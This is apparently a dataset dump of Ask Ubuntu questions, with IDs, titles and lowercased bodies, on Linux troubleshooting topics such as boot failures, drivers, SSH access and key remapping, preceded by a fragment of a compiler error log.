corefcn/pt-jit.cc:1903:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1904:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1905:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1906:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:1907:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc : in member function 'void tree_jit : :optimize ( llvm : :function* ) ' : corefcn/pt-jit.cc:2003:22 : error : invalid use of incomplete type 'struct llvm : :passmanager' corefcn/jit-util.h:46:9 : error : forward declaration of 'struct llvm : :passmanager' corefcn/pt-jit.cc:2004:15 : error : invalid use of incomplete type 'struct llvm : :functionpassmanager' corefcn/jit-util.h:45:9 : error : forward declaration of 'struct llvm : :functionpassmanager' corefcn/pt-jit.cc:2010:34 : error : 'f_binary ' is not a member of 'llvm : :raw_fd_ostream' make [ 3 ] : *** [ corefcn/corefcn_libcorefcn_la-pt-jit.lo ] error 1 make [ 2 ] : *** [ install ] error 2 make [ 1 ] : *** [ install-recursive ] error 1 make : *** [ install ] error 2
404544	how to connect to amazon ec2 desktop ami instance	i have started an ec2 instance from raring desktop ami image . however i am not able to do the standard ssh -i ubuntu @ host type login on this machine . i get the following error : permission denied ( publickey ) . the ami was picked from here - http : //cloud-images.ubuntu.com/desktop/raring/current/ i understand that this can be caused due to reasons like using the wrong key and all , but that is not the case here , as i am able to login to a normal server ami based instance using the above . i tried connecting via nomachine client , but with no success again . how can i connect to ubuntu desktop instance using ssh ? and what client do i need to access in gui mode ?
404549	simulate enter press in a screen	i have successfully run command screen -s run -x stuff 'stop'`echo -ne '\015'` in the terminal and had screen run receive the stop command and then receive the simulated enter press . this results in the program running in that screen terminating . however when i try to make a script which looks like this # ! /bin/sh screen -s run -x stuff 'stop'`echo -ne '\015'` the screen revives the text -x : stuff : invalid option stop-ne i would like to know what is wrong with my script and how to correct it so screen run receives the stop command and then receives an enter press
404552	how to keep changes after reboot ?	one month ago i changed my laptop brightness settings in grub like this step : replace this line grub_cmdline_linux_default= '' quiet splash '' with grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' and it worked . now i can change brightness from 100 % to zero . ( i have 12.04 lts ubuntu ) my problem is that i can change brightness settings , but after rebooting my laptop it goes from the previous setting to 100 % . i mean that it worked but i have to change the settings every time ( pressing button brightness - ) to lower it . does anyone knows how to keep previous setting after reboot ?
404557	bluetooth in ubuntu 13.10	i have installed ubuntu 13.10 on a new laptop just a few moments ago . i installed it via dvd rw on which i have copied an iso image downloaded from official ubuntu site . with this dvd i have already installed ubuntu 13.10 on another laptop ( about a month ago ) on which no errors have occurred ( so far ) . however on this laptop i seem to have a problem with bluetooth . every time i try to turn it off in settings menu , it turns itself back on . it 's quite annoying ... computer software is up-to-date ( no update fixed this ) .. , anyone has a clue with this issue ?
404558	ubuntu 13.10 login credentials again	i was using my laptop which runs ubuntu 13.10 and wanted to switch workspaces . i 'm not exactly sure which keys i pressed , but after pressing [ ctrl + alt + arrow key ] to switch workspaces my screen turned purple-black ( i 'm colourblind ) and asked for my login and password . i have no idea what my login is , i 've tried using the name of the laptop and then the appropriate password but after about two seconds the screen will display `` incorrect login '' . i 'm not sure how to fix this issue , it happened on multiple occasions and at random , causing me to have to reboot my laptop . again , the laptop randomly turns to a purple-black screen and asks for 'eric-laptop login ' ( name of the laptop ) , and a password .
404566	how can i share my internet connection from windows to ubuntu ?	okay , so i have a mobile connection attached to my main pc ( windows 8.1 ) , the address range is 192.168.43.1 - 255 with the gateway being 192.168.43.1 and i want to share this to my ubuntu server which is sitting in my lan without an internet connection , my lan address range is 10.1.1.1 - 255 . i have tried : windows internet sharing but that wont work as there would be 2 dhcp servers on the lan ( not a good thing ) a proxy , but for windows i ca n't find any software that is actually good , i 'm quite new to squid so not very sure how to configure it to what i need it to do . vpn , this is also a nice option but again ca n't find any decent software for windows that can do it , if my main pc was windows server than it would be a different story . if i could make the windows pc act as a gateway where the ubuntu server could just set a static ip pointing towards it without any dhcp server running , that would be great . but again i ca n't find any software to do this either . any help is much appreciated .
404567	how to organize/sort images by exif image data	i have recovered images from a lost partition and i need to sort them or put them into a folder by the creating date of the exif data of each image i have installed digikam and also shotwell but have not found the way to do this on any of the options can any one explain to me how to do it with any of those 2 programs or even a new program for ubutun 13
404568	how to change the volume change command that is run by the volume change shortcuts	i want to be able to access volume levels above 100 % using the volume control buttons on my computer . the commands i want to run are as follows : volume up : pactl set-sink-volume 1 +10 % volume down : pactl set-sink-volume 1 -10 % the keyboard shortcuts can be accessed in the settings : how can i change the command that is run in order to increase or decrease the volume ? note that i want to use the default volume control shortcuts ( as opposed to disabling the default volume controls and creating new custom shortcuts for the same buttons ) and i want to avoid key remapping . thanks for your help !
404569	phantom awn dock that wont go away	i have installed 12.04 lts off the minimal iso and installed only the ubuntu-desktop package and ripped out unity and installed awn . and upon first start i have a phantom dock underneath the actual dock which i can not get rid of , and i can not remove it . i have deleted everything in ~/.awn-settings , ~/.config/awn and ~/.gconf/apps/avant-window-manager and restarted awn and none of the configurations changed . the docks are still there with the themes i chose with the applets i chose for the actual correct menu . i even went so far as i purged all awn packages , did a system wide search for avant and awn and deleted everything and reinstalled only to have everything the same . how can i fix this ?
404571	ubuntu 12.04 lts no desktop anymore , only recovery option with low graphics support	this is my first question ever , please be nice ! problem : after automatic update for 32bit-ubuntu 12.04 lts unity-3d did n't worked any more , so i tried to reinstall the proprietary driver for my ati/amd hd4870 but it did n't worked either . after that ubuntu booted straight into terminal . no unity-2d either . after a few desperate terminal command line attempts like : sudo apt-get purge fglrx* sudo apt-get install -- reinstall xserver-xorg-video-radeon and so on , only the grub recovery version seems to work . ( all other options freeze at the ubuntu loading screen . question : is there a simple solution , or should i go with a ubuntu 13.10 `` recovery '' installation ? thank you !
404578	is there an application that can unlock my computer via bluetooth ?	i have a mac and i use an application called tokenlock that uses my ipod 's bluetooth signal to lock/unlock my computer when i get near/too far from it . is there something like that for ubuntu ?
404579	why specifically does n't wubi work with windows 8 computers ?	i 've never tried wubi , but i really like the idea and want to do some fiddling around with it . however i have a windows 8 system and i 'm aware that wubi does n't work with windows 8 systems for lots of people , but no matter how much i search i 've been unable to find out specifically why . is it because wubi does n't support guid partitions tables , or because wubi does n't support uefi , or something else ? i would like to know because then i can adjust my system to work with it . i have a backup of my computer + a re-install image , so no worries there .
404581	how can i make muon-updater to install updates without requiring password ?	is there any way to bypass authentication process like adding the user with special permissions etc ?
404582	ubuntu 13.10 login problem	i 've got a problem with ubuntu 13.10 . i installed the drivers for my ati mobility radeon hd 3470 . the installation was just fine . when i later on was doing a reboot and logged in it just returned to login screen . i put in my password and pressing the enter key . the screen went black and a second or to later i was back at the login screen . i 'm posting a link to a youtube video showing the problem . link to youtube video ubuntu 13.10 runs on a toshiba satellite a300d . before i was installing the driver the login went just fine . the driver i was using is amd catalystâ˘ 13.1 proprietary linux x86 display driver downloaded from here : http : //support.amd.com/en-us/download/desktop/legacy ? product=legacy2 & os=linux % 20x86 i hope someone can help me to solve this problem . thanks in advance .
404585	how to properly install nvidia drivers and modern opengl ?	i have a laptop with ubuntu 13.10 running on a virtualbox and i need to develop a program in modern opengl ( 3.0+ ) and i believe i need to install the proper nvidia drivers for my computer . i have a 765gtx on my laptop and an intel hd5000 on-board video card . i tried to install the nvidia drivers a couple of times but it always messes my desktop and what not . could someone help me with this ?
404589	ubuntu 13.10 macbook air mavericks parallels 9 black screen	i can install ubuntu 13.10 in parallels ok and then log in . problem is ubuntu does an update and i get black screen / desktop such that i ca n't see any app windows that i open . i 've tried a few of the other suggestions and they do n't work for me .
404591	apache / nginx / varnish - gzip does not work on css , js	my current setup is as following : apache - > nginx - > varnish running on ubuntu apache2.conf : h**p : //pastebin.com/a3wehabe .htaccess : h**p : //pastebin.com/yre4hdsy ( edited to allow deflate ) nginx.conf : h**p : //pastebin.com/6x59ctar ( gzip enabled ) varnish : default settings my problem is , it seems that gzip only works with html content , not css or js . i tested gzip with this tool at : http : //www.gidnetwork.com/tools/gzip-test.php h**p : //rentsites.com.au result : compressed yes status http/1.1 200 ok server nginx/0.7.65 content-type text/html ; charset=utf-8 x-powered-by php/5.3.2-1ubuntu4.22 x-pingback h**p : //rentsites.com.au/xmlrpc.php vary accept-encoding content-encoding gzip content-length 2281 accept-ranges bytes date mon , 13 jan 201400:50:26 gmt x-varnish 785049695 785049694 age 13 via 1.1 varnish connection close h**p : //rentsites.com.au/wp-includes/js/jquery/jquery.js result : compressed no status http/1.1 200 ok server nginx/0.7.65 content-type application/x-javascript last-modified wed , 21 aug 2013 15:41:10 gmt expires mon , 12 jan 2015 23:17:22 gmt cache-control max-age=31536000 , public pragma public content-length 93085 accept-ranges bytes date mon , 13 jan 2014 00:27:30 gmt x-varnish 785049693 785049631 age 4208 via 1.1 varnish connection close h**p : //rentsites.com.au/wp-content/themes/twentyfourteen/genericons/genericons.css result : compressed no status http/1.1 200 ok server nginx/0.7.65 content-type text/css last-modified tue , 12 nov 2013 18:38:10 gmt expires mon , 12 jan 2015 23:16:50 gmt cache-control max-age=31536000 , public pragma public content-length 22680 accept-ranges bytes date mon , 13 jan 2014 00:52:38 gmt x-varnish 785049696 785049621 age 5748 via 1.1 varnish connection close please help . thanks for reading .
404593	remap command/apple key to work as the control key	i have an ibook g4 running lubuntu 12.04 lts and i would like to re-map the command/apple keys to work as control . i 've looked at using xmodmap , but so far i have failed at it . and , after trying the instructions here : askubuntu.com/questions/137172/how-to-remap-superleft-key-to-control-key neither the ctrl key nor the apple/command key works as control . this most very perturbing . this is what my ~/.xmodmap looks like : keycode 8 = keycode 9 = escape nosymbol escape keycode 10 = 1 exclam 1 exclam exclamdown u2044 exclamdown keycode 11 = 2 at 2 at trademark eurosign trademark keycode 12 = 3 numbersign 3 numbersign sterling u2039 sterling keycode 13 = 4 dollar 4 dollar cent u203a cent keycode 14 = 5 percent 5 percent infinity ufb01 infinity keycode 15 = 6 asciicircum 6 asciicircum section ufb02 section keycode 16 = 7 ampersand 7 ampersand paragraph doubledagger paragraph keycode 17 = 8 asterisk 8 asterisk enfilledcircbullet degree enfilledcircbullet keycode 18 = 9 parenleft 9 parenleft ordfeminine periodcentered ordfeminine keycode 19 = 0 parenright 0 parenright masculine singlelowquotemark masculine keycode 20 = minus underscore minus underscore endash emdash endash keycode 21 = equal plus equal plus notequal plusminus notequal keycode 22 = backspace backspace backspace backspace keycode 23 = tab iso_left_tab tab iso_left_tab keycode 24 = q q q q oe oe oe keycode 25 = w w w w u2211 doublelowquotemark u2211 keycode 26 = e e e e dead_acute acute dead_acute keycode 27 = r r r r registered u2030 registered keycode 28 = t t t t dagger dead_caron dagger keycode 29 = y y y y yen onequarter yen keycode 30 = u u u u dead_diaeresis diaeresis dead_diaeresis keycode 31 = i i i i dead_circumflex u02c6 dead_circumflex keycode 32 = o o o o oslash oslash oslash keycode 33 = p p p p greek_pi u220f greek_pi keycode 34 = bracketleft braceleft bracketleft braceleft leftdoublequotemark rightdoublequotemark leftdoublequotemark keycode 35 = bracketright braceright bracketright braceright leftsinglequotemark rightsinglequotemark leftsinglequotemark keycode 36 = return nosymbol return keycode 37 = control_l nosymbol control_l keycode 38 = a a a a aring aring aring keycode 39 = s s s s ssharp dead_stroke ssharp keycode 40 = d d d d partialderivative eth partialderivative keycode 41 = f f f f function dead_hook function keycode 42 = g g g g copyright dead_doubleacute copyright keycode 43 = h h h h dead_abovedot dead_belowdot dead_abovedot keycode 44 = j j j j u2206 onehalf u2206 keycode 45 = k k k k dead_abovering uf8ff dead_abovering keycode 46 = l l l l notsign thorn notsign keycode 47 = semicolon colon semicolon colon u2026 thorn u2026 keycode 48 = apostrophe quotedbl apostrophe quotedbl ae ae ae keycode 49 = grave asciitilde grave asciitilde dead_grave dead_horn dead_grave keycode 50 = shift_l nosymbol shift_l keycode 51 = backslash bar backslash bar guillemotleft guillemotright guillemotleft keycode 52 = z z z z greek_omega dead_cedilla greek_omega keycode 53 = x x x x approxeq dead_ogonek approxeq keycode 54 = c c c c ccedilla ccedilla ccedilla keycode 55 = v v v v squareroot u25ca squareroot keycode 56 = b b b b integral idotless integral keycode 57 = n n n n dead_tilde u02dc dead_tilde keycode 58 = m m m m mu threequarters mu keycode 59 = comma less comma less lessthanequal dead_macron lessthanequal keycode 60 = period greater period greater greaterthanequal dead_breve greaterthanequal keycode 61 = slash question slash question division questiondown division keycode 62 = shift_r nosymbol shift_r keycode 63 = kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply xf86cleargrab keycode 64 = alt_l meta_l alt_l meta_l keycode 65 = space nosymbol space keycode 66 = caps_lock nosymbol caps_lock keycode 67 = f1 f1 f1 f1 f1 f1 xf86switch_vt_1 keycode 68 = f2 f2 f2 f2 f2 f2 xf86switch_vt_2 keycode 69 = f3 f3 f3 f3 f3 f3 xf86switch_vt_3 keycode 70 = f4 f4 f4 f4 f4 f4 xf86switch_vt_4 keycode 71 = f5 f5 f5 f5 f5 f5 xf86switch_vt_5 keycode 72 = f6 f6 f6 f6 f6 f6 xf86switch_vt_6 keycode 73 = f7 f7 f7 f7 f7 f7 xf86switch_vt_7 keycode 74 = f8 f8 f8 f8 f8 f8 xf86switch_vt_8 keycode 75 = f9 f9 f9 f9 f9 f9 xf86switch_vt_9 keycode 76 = f10 f10 f10 f10 f10 f10 xf86switch_vt_10 keycode 77 = num_lock nosymbol num_lock keycode 78 = scroll_lock nosymbol scroll_lock keycode 79 = kp_home kp_7 kp_home kp_7 keycode 80 = kp_up kp_8 kp_up kp_8 keycode 81 = kp_prior kp_9 kp_prior kp_9 keycode 82 = kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract xf86prev_vmode keycode 83 = kp_left kp_4 kp_left kp_4 keycode 84 = kp_begin kp_5 kp_begin kp_5 keycode 85 = kp_right kp_6 kp_right kp_6 keycode 86 = kp_add kp_add kp_add kp_add kp_add kp_add xf86next_vmode keycode 87 = kp_end kp_1 kp_end kp_1 keycode 88 = kp_down kp_2 kp_down kp_2 keycode 89 = kp_next kp_3 kp_next kp_3 keycode 90 = kp_insert kp_0 kp_insert kp_0 keycode 91 = kp_delete kp_decimal kp_delete kp_decimal keycode 92 = iso_level3_shift nosymbol iso_level3_shift keycode 93 = keycode 94 = section plusminus section plusminus section plusminus section keycode 95 = f11 f11 f11 f11 f11 f11 xf86switch_vt_11 keycode 96 = f12 f12 f12 f12 f12 f12 xf86switch_vt_12 keycode 97 = keycode 98 = katakana nosymbol katakana keycode 99 = hiragana nosymbol hiragana keycode 100 = henkan_mode nosymbol henkan_mode keycode 101 = hiragana_katakana nosymbol hiragana_katakana keycode 102 = muhenkan nosymbol muhenkan keycode 103 = keycode 104 = kp_enter nosymbol kp_enter keycode 105 = control_r nosymbol control_r keycode 106 = kp_divide kp_divide kp_divide kp_divide kp_divide kp_divide xf86ungrab keycode 107 = print sys_req print sys_req keycode 108 = iso_level3_shift nosymbol iso_level3_shift keycode 109 = linefeed nosymbol linefeed keycode 110 = home nosymbol home keycode 111 = up nosymbol up keycode 112 = prior nosymbol prior keycode 113 = left nosymbol left keycode 114 = right nosymbol right keycode 115 = end nosymbol end keycode 116 = down nosymbol down keycode 117 = next nosymbol next keycode 118 = insert nosymbol insert keycode 119 = delete nosymbol delete keycode 120 = keycode 121 = xf86audiomute nosymbol xf86audiomute keycode 122 = xf86audiolowervolume nosymbol xf86audiolowervolume keycode 123 = xf86audioraisevolume nosymbol xf86audioraisevolume keycode 124 = xf86poweroff nosymbol xf86poweroff keycode 125 = kp_equal nosymbol kp_equal keycode 126 = plusminus nosymbol plusminus keycode 127 = pause break pause break keycode 128 = xf86launcha nosymbol xf86launcha keycode 129 = kp_decimal kp_decimal kp_decimal kp_decimal keycode 130 = hangul nosymbol hangul keycode 131 = hangul_hanja nosymbol hangul_hanja keycode 132 = keycode 133 = control_l nosymbol control_l keycode 134 = super_r nosymbol super_r keycode 135 = menu nosymbol menu keycode 136 = cancel nosymbol cancel keycode 137 = redo nosymbol redo keycode 138 = sunprops nosymbol sunprops keycode 139 = undo nosymbol undo keycode 140 = sunfront nosymbol sunfront keycode 141 = xf86copy nosymbol xf86copy keycode 142 = sunopen nosymbol sunopen keycode 143 = xf86paste nosymbol xf86paste keycode 144 = find nosymbol find keycode 145 = xf86cut nosymbol xf86cut keycode 146 = help nosymbol help keycode 147 = xf86menukb nosymbol xf86menukb keycode 148 = xf86calculator nosymbol xf86calculator keycode 149 = keycode 150 = xf86sleep nosymbol xf86sleep keycode 151 = xf86wakeup nosymbol xf86wakeup keycode 152 = xf86explorer nosymbol xf86explorer keycode 153 = xf86send nosymbol xf86send keycode 154 = keycode 155 = xf86xfer nosymbol xf86xfer keycode 156 = xf86launch1 nosymbol xf86launch1 keycode 157 = xf86launch2 nosymbol xf86launch2 keycode 158 = xf86www nosymbol xf86www keycode 159 = xf86dos nosymbol xf86dos keycode 160 = xf86screensaver nosymbol xf86screensaver keycode 161 = keycode 162 = xf86rotatewindows nosymbol xf86rotatewindows keycode 163 = xf86mail nosymbol xf86mail keycode 164 = xf86favorites nosymbol xf86favorites keycode 165 = xf86mycomputer nosymbol xf86mycomputer keycode 166 = xf86back nosymbol xf86back keycode 167 = xf86forward nosymbol xf86forward keycode 168 = keycode 169 = xf86eject nosymbol xf86eject keycode 170 = xf86eject xf86eject xf86eject xf86eject keycode 171 = xf86audionext nosymbol xf86audionext keycode 172 = xf86audioplay xf86audiopause xf86audioplay xf86audiopause keycode 173 = xf86audioprev nosymbol xf86audioprev keycode 174 = xf86audiostop xf86eject xf86audiostop xf86eject keycode 175 = xf86audiorecord nosymbol xf86audiorecord keycode 176 = xf86audiorewind nosymbol xf86audiorewind keycode 177 = xf86phone nosymbol xf86phone keycode 178 = keycode 179 = xf86tools nosymbol xf86tools keycode 180 = xf86homepage nosymbol xf86homepage keycode 181 = xf86reload nosymbol xf86reload keycode 182 = xf86close nosymbol xf86close keycode 183 = keycode 184 = keycode 185 = xf86scrollup nosymbol xf86scrollup keycode 186 = xf86scrolldown nosymbol xf86scrolldown keycode 187 = parenleft nosymbol parenleft keycode 188 = parenright nosymbol parenright keycode 189 = xf86new nosymbol xf86new keycode 190 = redo nosymbol redo keycode 191 = xf86tools nosymbol xf86tools keycode 192 = xf86launch5 nosymbol xf86launch5 keycode 193 = xf86launch6 nosymbol xf86launch6 keycode 194 = xf86launch7 nosymbol xf86launch7 keycode 195 = xf86launch8 nosymbol xf86launch8 keycode 196 = xf86launch9 nosymbol xf86launch9 keycode 197 = keycode 198 = keycode 199 = xf86touchpadtoggle nosymbol xf86touchpadtoggle keycode 200 = xf86touchpadon nosymbol xf86touchpadon keycode 201 = xf86touchpadoff nosymbol xf86touchpadoff keycode 202 = keycode 203 = mode_switch nosymbol mode_switch keycode 204 = nosymbol alt_l nosymbol alt_l keycode 205 = nosymbol meta_l nosymbol meta_l keycode 206 = nosymbol super_l nosymbol super_l keycode 207 = nosymbol hyper_l nosymbol hyper_l keycode 208 = xf86audioplay nosymbol xf86audioplay keycode 209 = xf86audiopause nosymbol xf86audiopause keycode 210 = xf86launch3 nosymbol xf86launch3 keycode 211 = xf86launch4 nosymbol xf86launch4 keycode 212 = xf86launchb nosymbol xf86launchb keycode 213 = xf86suspend nosymbol xf86suspend keycode 214 = xf86close nosymbol xf86close keycode 215 = xf86audioplay nosymbol xf86audioplay keycode 216 = xf86audioforward nosymbol xf86audioforward keycode 217 = keycode 218 = print nosymbol print keycode 219 = keycode 220 = xf86webcam nosymbol xf86webcam keycode 221 = keycode 222 = keycode 223 = xf86mail nosymbol xf86mail keycode 224 = xf86messenger nosymbol xf86messenger keycode 225 = xf86search nosymbol xf86search keycode 226 = xf86go nosymbol xf86go keycode 227 = xf86finance nosymbol xf86finance keycode 228 = xf86game nosymbol xf86game keycode 229 = xf86shop nosymbol xf86shop keycode 230 = keycode 231 = cancel nosymbol cancel keycode 232 = xf86monbrightnessdown nosymbol xf86monbrightnessdown keycode 233 = xf86monbrightnessup nosymbol xf86monbrightnessup keycode 234 = xf86audiomedia nosymbol xf86audiomedia keycode 235 = xf86display nosymbol xf86display keycode 236 = xf86kbdlightonoff nosymbol xf86kbdlightonoff keycode 237 = xf86kbdbrightnessdown nosymbol xf86kbdbrightnessdown keycode 238 = xf86kbdbrightnessup nosymbol xf86kbdbrightnessup keycode 239 = xf86send nosymbol xf86send keycode 240 = xf86reply nosymbol xf86reply keycode 241 = xf86mailforward nosymbol xf86mailforward keycode 242 = xf86save nosymbol xf86save keycode 243 = xf86documents nosymbol xf86documents keycode 244 = xf86battery nosymbol xf86battery keycode 245 = xf86bluetooth nosymbol xf86bluetooth keycode 246 = xf86wlan nosymbol xf86wlan keycode 247 = keycode 248 = keycode 249 = keycode 250 = keycode 251 = keycode 252 = keycode 253 = keycode 254 = keycode 255 = clear control clear mod4 remove control = control_l control_r remove mod4 = super_l super_r add control = super_l how can i change the apple/command key to work as control ? should i use xkeymap or an app ? and is it any different for lubuntu than vanilla ubuntu ? one other thing i 've noticed is that i will randomly jump to a page or around a text editor , but this may just be system lag . edit i was having a problem during my experimentation that was making it so both ctrl and apple/command worked like command , not doing anything . this was really annoying , but i fixed it by removing the last 5 lines in ~/.xmodmap .
404594	i get an error when i try to follow tor browser bundle instructions ... help ?	i 'm using ubuntu 12.04 and i 'm trying to get tor browser bundle . i 've downloaded the package and then the tor project website tells me to put this in my terminal tar -xvjf tor-browser-linux32-3.5_lang.tar.xz i tried that but it gave me this err0r : tar ( child ) : tor-browser-linux32-3.5_lang.tar.xz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now ..help ?
404595	ubuntu 12.04 not loading after installing updates - initctl : event failed	after updating my ubuntu installation i get a blank screen when try to load it . i have dual boot with windows which works fine . going into recovery mode - > resume normal boot gives me the following error : swapon : /dev/disk/by-uuid/18ed9859-1325-4121-96c8-2e696055454e : swapon failed : device or resource busy mountall : swapon /dev/disk/by-uuid/18ed9859-1325-4121-96c8-2e696055454e [ 3542 ] terminated with status 255 mountall : problem activating swap : /dev/disk/by-uuid/18ed9859-1325-4121-96c8-2e696055454e modem-manager [ 3694 ] : < info > modemmanager ( version 0.5.2.0 ) starting ... modem-manager [ 3694 ] : < info > loaded plugin x22x skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : user.sbin.rsyslogd * starting apparmor profiles [ ok ] initctl : event failed not sure what other info is helpful but these are some of my specs : intel core i5-4430 3.00ghz nvidia geforce gtx 660 ti linux 3.5.0-45-generic ubuntu 12.04 things i 've tried ( from this question ) : # went in to cli with ctrl+alt+f1 : sudo apt-get purge nvidia-current sudo apt-get install nvidia-current sudo reboot # made sure all dependencies are ok : sudo apt-get -f install after doing the above i did n't get the swapon notices , but still go the apparmor issue . i do n't know what else to check ( or how to check ) in order to debug this issue , any help is much appreciated .
404596	wine sound problems fallout 3	when i play fallout 3 in wine i get the start up music but as soon as i load a save the sound just goes , i 'm running ubuntu13.04 amd 64 bit , i also get the same problem when i play how to survive , i 've been looking everywhere for a solution but they are always hard to follow as i 'm new to linux .
404600	need help w ? samsung ml-2545 printer on 12.04 lts	i have a samsung ml-2545 printer and can not find a driver that can load.. is there a driver that will load without special code ? i am on 12.1
404601	can i run ubuntu `` alongside '' my windows on the hard disk ?	i have been trying to put ubuntu on my 8gb flash drive , while already having it on a 4gb and not having enough space . i do n't want to deal with it any more . when it said i could install ubuntu alongside my windows , i do n't know how that works . can i chose which one i want to boot , when i go to the f12 menu ? or does that even work ?
404602	split screen need of help	when i 1st . turn on our p.c . ( the screen where u put in your password ) it is split in 2. and there is a key board on the top left hand side of the screen . on the other half is a keyboard that is almost the size of the screen and u have to use the mouse to move it around so u can put the password in it to be able to get to the screen to get on the internet or other things on that screen and its no longer split in half . u have to use the right side of the screen that has the large keyboard on it to type in the password . u cant do it with the numbers on the keyboard . how do i get rid of the split screen . i think my 3 yr. old hit a button or 2 but i ca n't figure out how to fix it any suggestions ? thanks
404605	how can i tell what processes are running at shutdown ?	i 'm having a problem where it takes ages to shutdown or reboot my computer . shutdown -h puts it down right away , but otherwise it takes about 5 minutes to shutdown . booting up is very quick . how can i tell what is causing this delay ? there is nothing in /var/crash
404608	ubuntu server 12.04.3 lts no internet connection	my ubuntu server is no longer accessible to the internet . during boot it will say waiting for network configuration then waiting up to 60 more seconds for network configuration then it just skips it and my server is not accessible remotely . this just happened today , it was working just fine the other day and i do n't recall messing with any settings . i tried a different cable but that did n't help , the network card should be fine , it is a solid orange ( which means its connected @ 1gbps ) and the switch i 'm using is fine as the devices connected to it work . i 'm at a lost at what is the problem , any suggestions will be welcomed thank you
404611	no grub menu lubuntu 12.04 powerpc , only text	i installed lubuntu 12.04 on my ibook g4 over os x 10.4.11 . i had to manually add the b43 internet driver , but that and the rest of the installation went fine . i 'm now updating . however , when i rebooted , i got a strange boot screen . obviously the mac bootloader had been overwritten , but grub , afaik , had n't been installed ! it gave me a command-line-like screen that says : first stage ubuntu boot enter l for linux , c for cd boot : which , when i push l and enter , takes me to the yaboot screen : welcome to yaboot 1.3.6 from which lubuntu is loaded . my question is , why is n't grub installed and how can i install it ? edit : i updated what the bootloader says . see above edit : i have been borking around the internet trying to solve this myself and have found a viable solution , except it has n't done anything .
404612	ubuntu 13.04 no menu bar	i have lenovo thinkpad t520 . just updated to 13.04 . i can see desktop icons , but no menu . i can start terminal , but i can not close windows , move them or resize them . also , alt+tab does not work . i have tried a few things , such as menu bar and launcher missing in ubuntu 13.04 but no luck . please help , i 've waisted a whole day on this . thanks !
404614	ca n't boot into windows 7 or ubuntu12.10 on a dual boot computer	my computer suddenly shut down a few times when i was using ubuntu and then i could n't even boot into windows or ubuntu . it 's a dual boot computer and i installed ubuntu from windows with wubi . when i tried to boot into ubuntu it said that errors were found while checking the disk drive for / i search online and found that the command mount -o remount , rw / i tried it but only sometimes it worked and even then the computer then shut down suddenly ... and when it did n't work . the following message was shown : /host : device is busy /run : device is busy /dev : device is busy but i could boot into ubuntu once and used boot-repair to generate a report . ( now i ca n't seem to be able to boot into ubuntu anymore ) it 's here . when i tried to boot into windows , it just got stuck at the windows logo screen . and after a while it suddenly shut down . so based on the report , what 's the problem ? is it possible to fix the problem within ubuntu if i got lucky again and boot into it ? thanks !
404618	how do i add webkit webview to the ubuntu sdk ?	i 'm trying to do this tutorial for learning and it seems that i have to keep adding things for it to go smoothly . http : //developer.ubuntu.com/apps/html-5/tutorial/ i do n't have the `` rss-sample.qml '' file at all in my project . i do n't even have the html folder . also as the tutorial shows , it 's supposed to have the option for html5 touch ui project but i had to use html5 tabbed touch ui instead because that 's the closest option i have . am i missing something ?
404620	how do i make my system to prompt me for windows and ubuntu , instead of directly booting to ubuntu ?	i have new lenovo laptop with pre-installed windows 8 . i was facing issues installing ubuntu l2.04 lts , so following a thread i made some changes , created some ext4 , swap , bootloader partitions and then ubuntu installation worked miraculously . also , what i did was converted my system to boot from legacy instead of uefi ( secure boot ) . now , my system is not able to boot into windows and it boots to ubuntu directly and when i am trying to convert my ubuntu to boot from efi using boot repair , it tells me that my system is configured to boot from legacy . how do i get my system to show me prompt for me to select windows or ubuntu at bootup ? note : my windows is not deleted , it exists , all its file exits , which i can access from ubunt . thanks so much for all the help .
404621	how do i get text/html decoder plugins for python 2.7 ( ubuntu 12.04 )	how do i get text/html decoder plugins for python 2.7 ? i have tried all the methods suggested on the forums here.they did not work . in addition to trying helix-player in the form of real player , i also tried gecko media player as gnome player , adobe flash and all the ubuntu restricted programs.they did not work either ! python 2.7 keeps looking for these text/html plugins but can not find them ! i need these in order to play some internet radio stations that are supported on an internet radio portal . can you help ? thanks !
404622	linux live usb 's will not boot on msi gt70-2oc	i recently got a new laptop for christmas , i love it . there is one crucial error though . it runs windows 8 . i can not stand windows , let alone windows 8 . i want to keep windows 8 for the simple fact that this is a gaming pc , and sadly linux is in the shallow end of the dream pool in that department . i can not get the ubuntu live usb to boot . in fact i cant get any linux usb 's to boot . i have tried every suggestion i have seen , other than updating the ufci bios . that scares me . i have tried going into legacy mode , changing the way the ssd works , turning off fast boot , turning off secure boot , and i even turned off the msi boot logo . nothing worked . i can boot into the usb but when i select try ubuntu without installing , it goes to a black screen and that 's it . any help would be appreciated . specs : 16 gb of ram 750 gb ssd intel core i7 nvidia geforce gtx 770m if you need any other info feel free to ask .
404624	installing broadcom wifi driver - no synaptic	first of all i 'm new to ubuntu ( 12.04 ) , i 've installed it to do basic coding for my final year of a physics degree . secondly , i 've searched high and low for a synaptic download link , the only ones i could find led me to expired pages . like other articles , i 'm having serious trouble installing the drivers for a broadcom wireless adaptor . every solution i 've looked at requires synaptic though , so i either need a solution that does n't , or for someone to help me with find a copy of synaptic . i get the classic : '' sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log '' message
404625	my hard disk has been formatted accidently	i chose the second option for installing ubuntu because i thought it would only remove windows ( 8.1 ) . however , now i have an empty hard drive . i had very important files on my hard drive . what should i do ? my future as a vet has been formatted !
